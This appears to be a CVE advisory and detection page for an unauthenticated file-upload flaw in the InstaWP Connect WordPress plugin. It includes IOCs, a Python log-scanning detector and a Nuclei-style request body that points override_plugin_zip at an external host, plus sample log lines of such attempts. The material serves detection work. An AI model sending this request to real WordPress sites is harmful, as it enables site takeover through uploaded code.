CVE-2024-2667
published 2024-05-02


Priority: P1 (score 85), critical, CVSS 3.1 base score 9.8
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Status: exploited in the wild; listed in VulnCheck KEV; used for initial access
EPSS: 5.75% (92.1th percentile)
The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

Affected

2 ranges
Vendor    Product                                        Version range   Fixed in
instawp   instawp_connect                                < 0.1.0.23      0.1.0.23
instawp   instawp_connect_1-click_wp_staging_migration   <= 0.1.0.22     (none listed)

Detection & IOCs

url:      /wp-json/instawp-connect/v1/config
url:      /?rest_route=/instawp-connect/v1/config
path:     /wp-content/plugins/instawp-connect/
request body (from the Nuclei template):  api_key={{randstr}}&override_plugin_zip=http://{{interactsh-url}}
  • Detect exploitation attempts by monitoring POST requests to the REST API endpoint /?rest_route=/instawp-connect/v1/config or /wp-json/instawp-connect/v1/config whose 'override_plugin_zip' parameter points to an external URL.
  • A successful exploitation response returns HTTP 200 with a Content-Type of application/json and a JSON body containing both a '"status":true' and a '"message":' field.
  • Identify vulnerable WordPress installations by searching for the InstaWP Connect plugin path (/wp-content/plugins/instawp-connect/) in the page body.
  • The attack is unauthenticated: no session or authentication token is required. Any POST to the config endpoint carrying override_plugin_zip should be treated as suspicious.
  • The vulnerability affects all versions up to and including 0.1.0.22; version 0.1.0.23 and later are patched. Scope detection rules to installations running vulnerable versions.
  • The Nuclei template uses an out-of-band interaction (interactsh) to confirm that the server fetches the supplied override_plugin_zip URL. Monitoring for outbound HTTP requests from the WordPress server that are triggered by this endpoint can therefore also serve as a detection signal.
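The request-side detection described above, as an added Python example that is not part of this page or of the InstaWP project. It assumes a constructed tab-separated log format (method, URL, status, body) such as a reverse proxy or WAF that records POST bodies could emit, and flags POSTs to the config endpoint whose override_plugin_zip points at an external URL, rating HTTP 200 responses as likely successes.

```python
from urllib.parse import urlsplit, parse_qs

# Endpoint forms named on the page: the pretty permalink and the rest_route query form.
CONFIG_PATH = "/wp-json/instawp-connect/v1/config"
REST_ROUTE = "/instawp-connect/v1/config"

# Constructed sample log: method, URL, status, body ("-" when empty), tab-separated.
# 203.0.113.x / 198.51.100.x are documentation addresses, not real indicators.
SAMPLE_LOGS = """\
POST\t/wp-json/instawp-connect/v1/config\t200\tapi_key=abc123&override_plugin_zip=http://203.0.113.7/x.zip
POST\t/?rest_route=/instawp-connect/v1/config\t200\tapi_key=zzz&override_plugin_zip=https://198.51.100.9/p.zip
POST\t/wp-json/instawp-connect/v1/config\t403\tapi_key=zzz&override_plugin_zip=http://203.0.113.7/x.zip
GET\t/wp-json/instawp-connect/v1/config\t200\t-
POST\t/wp-json/wp/v2/posts\t201\ttitle=hello
POST\t/wp-json/instawp-connect/v1/config\t200\tapi_key=abc&override_plugin_zip=/wp-content/uploads/p.zip
"""


def targets_config_endpoint(url):
    """True if the request URL reaches the instawp-connect config endpoint in either form."""
    parts = urlsplit(url)
    if parts.path.rstrip("/") == CONFIG_PATH:
        return True
    routes = parse_qs(parts.query).get("rest_route", [])
    return any(r.rstrip("/") == REST_ROUTE for r in routes)


def external_override(body):
    """Return the override_plugin_zip value when it is an external http(s) URL, else None."""
    value = parse_qs(body).get("override_plugin_zip", [None])[0]
    if value and value.lower().startswith(("http://", "https://")):
        return value
    return None


def classify(line):
    """Return (verdict, url) for a suspicious line, or None for benign traffic."""
    method, url, status, body = line.split("\t", 3)
    if method != "POST" or not targets_config_endpoint(url):
        return None
    target = external_override(body)
    if target is None:
        return None
    # The page states a successful exploitation response is HTTP 200 with JSON.
    return ("likely-success" if status == "200" else "attempt", target)


def scan(log_text):
    return [hit for hit in map(classify, filter(None, log_text.splitlines())) if hit]


if __name__ == "__main__":
    for verdict, target in scan(SAMPLE_LOGS):
        print(verdict, target)
```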

CVSS provenance

Source          Score   Severity   Vector
nvd (v3.1)      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck       9.8     CRITICAL
vendor_redhat   5.3     MEDIUM